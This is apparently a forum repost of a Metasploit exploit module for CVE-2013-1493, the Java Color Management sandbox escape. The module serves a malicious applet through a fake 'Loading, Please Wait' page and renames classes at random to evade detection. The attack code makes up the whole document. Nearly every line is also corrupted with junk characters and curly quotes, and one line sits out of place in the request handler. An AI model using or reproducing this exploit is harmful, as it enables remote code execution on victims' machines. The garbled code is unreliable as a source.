##
& `8 u, ?. a! E, S: L; M( S* B, x' z% Q: Z+ x* W
# This file is part of the Metasploit Framework and may be subject to1 e0 q0 J& \! x, B4 |
# redistribution and commercial restrictions. Please see the Metasploit
. E2 Z4 s& f$ o. K# s2 B' n4 B# web site for more information on licensing and terms of use.! N: [! ?4 N* f$ M. Z" e2 ?7 m8 w
# http://metasploit.com/! v( G, O7 w0 |6 Q
##$ u" R9 e8 B& }+ s
require ‘msf/core’
( M1 E8 I( d9 {, yrequire ‘rex’# |6 F' L4 `( d( t) y6 ~
class Metasploit3 < Msf::Exploit::Remote
$ R" `6 C9 y7 n% iRank = NormalRanking
! i2 A) j2 f" H2 M4 a( iinclude Msf::Exploit::Remote::HttpServer::HTML
& j! z8 j( w; _include Msf::Exploit::EXE
% ~; q% x( K' Z! A, j* Oinclude Msf::Exploit::Remote::BrowserAutopwn
: m. n1 o' L8 J: Cautopwn_info({ :javascript => false })& ~6 Q, p+ l) _/ w1 n4 W
def initialize( info = {} )* ], f% K, Q$ U, P7 D
super( update_info( info,
8 g$ V8 Z, t8 s* u: E$ ?( |" r‘Name’ => ‘Java CMM Remote Code Execution’,) t3 Q& B3 r1 m6 l
‘Description’ => %q{# ~/ T5 g* C& i: j: c
This module abuses the Color Management classes from a Java Applet to run
& s* s/ N! H) j% Y' U: A! B9 ~arbitrary Java code outside of the sandbox as exploited in the wild in February
0 @0 K' p6 K7 a3 Pand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
( u) J0 |% |* t5 F& K$ Z4 b2 gand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP15 Y9 l7 m5 ~8 ]7 q
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
3 C5 o% E# p! [. V& e, J# K/ vwarning in order to run the malicious applet.
: p. q* X$ N9 E* _7 D+ f B},
0 `0 ]: r% S& q% T# w1 T+ }1 b‘License’ => MSF_LICENSE,
2 X) |: o! U, ~% a* b- W‘Author’ =>4 ]* r6 F0 J$ k! y$ D; s
'Unknown', # Vulnerability discovery and Exploit
. R4 T2 h7 I3 Y! ~5 o, o S* Q: R'juan vazquez' # Metasploit module (just ported the published exploit)
7 i) a+ ~2 ]1 Z],
% a2 Y# t6 y1 x5 x‘References’ =>6 R( [+ n( Y$ e9 |
[
: ?; i* J" T2 M, \, [( h. f4 F[ 'CVE', '2013-1493' ],
* u% o9 E# Q Z& x[ 'OSVDB', '90737' ],. g" g+ u( R6 H9 ~6 J4 c
[ 'BID', '58238' ]," B/ }1 b+ \7 \
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],& L4 q8 D( G. k3 t* \$ F( U
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],5 _. ?* v: `7 ]+ e( Q" F
[ 'URL', 'http://pastie.org/pastes/6581034' ] [' S3 y9 t) b0 N
],% Z+ _" w: k' v4 W5 y, y
‘Platform’ => [ 'win', 'java' ],9 @& P+ ?) f: r# x& a5 L. A! }2 ]
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
m5 S1 U3 A$ n' s( \‘Targets’ =>
! Y3 G* t+ H; H: f# e4 ?$ J[2 M3 i8 g2 V# ~, h: r2 b+ A
[ 'Generic (Java Payload)',0 c5 T7 b4 [# ^) _" E# R3 w2 Y# t
{7 @/ Q$ \% T1 g, K5 V2 s n
'Platform' => 'java',
& t4 E4 n0 K! @" A7 n A'Arch' => ARCH_JAVA
- e2 a; u4 q3 c}
5 H7 v! k& k4 r+ w7 C4 n],; d6 j+ q8 j, _# K, N. O
[ 'Windows x86 (Native Payload)',
, @+ k8 r# {) O, {{- A5 \% E/ v# M: D/ U8 x
'Platform' => 'win',
/ m7 }6 ^, b2 M3 h; m9 h'Arch' => ARCH_X86$ \3 T& T5 h' y0 L* k$ c
}7 \5 k: w1 _2 [* H$ ]1 f) f* x
]. `& ?3 K& _6 k4 _$ D4 f7 S
], M" k/ r$ o( c
‘‘DisclosureDate’ => ‘Mar 01 2013′
2 _. k1 d8 [, u5 i( c& o))4 C5 I" J- O* D
end" a+ T# D, R' b: N+ \4 {) h. _
def setup! ~! K! {( R" F+ {8 [; D- Q; L9 P
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)* a- p3 ?$ i" m; D. j6 X
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 V) a! Q7 M, Spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
- U) s- U8 X% ]( M@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 M2 a8 q3 q& L$ p) W$ o% w: K
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
6 r4 G( V1 h F9 l, o8 m$ f% [@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }% D e4 g+ x" U, ?1 g( e
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
! _# F6 H* X) G7 E5 q8 |* w" \+ O@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 d! L/ m+ R% R" s" G+ g; r2 G@init_class_name = rand_text_alpha(“Init”.length): \2 p' |- X! Y9 D0 {; N% p2 d6 Q! L
@init_class.gsub!(“Init”, @init_class_name)
9 T; S; O" |) H8 _super
6 p" K7 C, ]- I/ e/ M! F1 ]& S: rend/ f* z, {- Q9 [, U8 a$ ?
def on_request_uri(cli, request)
* ^9 _! H0 V+ m. W$ v, rprint_status(“handling request for #{request.uri}”)% X& U( x9 G+ F6 M- U/ U. `
case request.uri) m% S- o% ]4 Y$ D: d9 D
when /\.jar$/i
9 E! K. p; L) a6 }" J+ l, a( p0 T8 s' _jar = payload.encoded_jar
) S' b" k' r6 s t( \# z3 k5 j( x0 zjar.add_file(“#{@init_class_name}.class”, @init_class)
4 d% \ Z/ |3 p) i% Ojar.add_file(“Leak.class”, @leak_class)& O! S* v9 x/ @7 M
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
- e# X3 g1 ], r8 _8 D: r: U% ?( |: Ujar.add_file(“MyColorSpace.class”, @color_space_class)5 Z8 v3 L r9 ^
DefaultTarget’ => 1,
6 I4 _0 f! O6 [6 `+ bmetasploit_str = rand_text_alpha(“metasploit”.length)+ N) S; `0 s2 u; w+ }
payload_str = rand_text_alpha(“payload”.length)
; u$ `0 B( n3 Gjar.entries.each { |entry|! ~( [% S1 j4 P% u
entry.name.gsub!(“metasploit”, metasploit_str). A. J, J) Z& t5 i& \5 b O
entry.name.gsub!(“Payload”, payload_str)
5 U/ i; X6 w: ~1 X! |. j- dentry.data = entry.data.gsub(“metasploit”, metasploit_str)
4 [! G. i8 N9 v7 j7 [. p- X2 tentry.data = entry.data.gsub(“Payload”, payload_str)0 b# K r+ t' E& v$ c% [: H$ J
}8 s" w7 L: n% A. O3 J: [! r5 ?
jar.build_manifest
; v" D. X7 t' k: I4 Tsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
; {5 R! v' h8 A$ R/ W4 i" X% ewhen /\/$/
6 ^9 D5 @, Z5 u, I( @payload = regenerate_payload(cli)6 U/ f; S4 O6 [, z5 V3 D+ T8 I
if not payload' z0 e4 D6 {" [5 Y0 t
print_error(“Failed to generate the payload.”)
! O0 X1 W" y2 Z+ S( o8 S2 gsend_not_found(cli)% O$ X' {1 u t
return
0 [- h( r; i5 Zend
$ Q* h% V" G% g8 P$ L1 @send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ }), e: w, b. f% w6 k
else
3 W; ~/ Y" B! J* K' N+ a7 Xsend_redirect(cli, get_resource() + ‘/’, ”)+ C9 Z' v7 G) d& o0 y, D
end
+ I$ ^, h$ s6 Z. kend
* R6 S4 x+ r* A' c9 |* _4 m' d/ w% Cdef generate_html
! r) p0 k# ~! O# qhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|! y% l# w8 \) O7 B: E) w
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|0 j, U5 T* i6 K/ e7 m" j y
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
) B) z0 r8 t- S; W B, Y( f5 A [html += %Q|</applet></body></html>|
3 ]' C' l/ G+ p4 l1 Greturn html
2 t8 R N" i$ }4 y" Y/ L; nend
8 [! ~! h: C" Oend
: m" [: Z$ Y; G' ^- R0 Iend/ ^4 o3 h' O: c
|
发表于 2013-4-4 17:31:17
收藏
支持
反对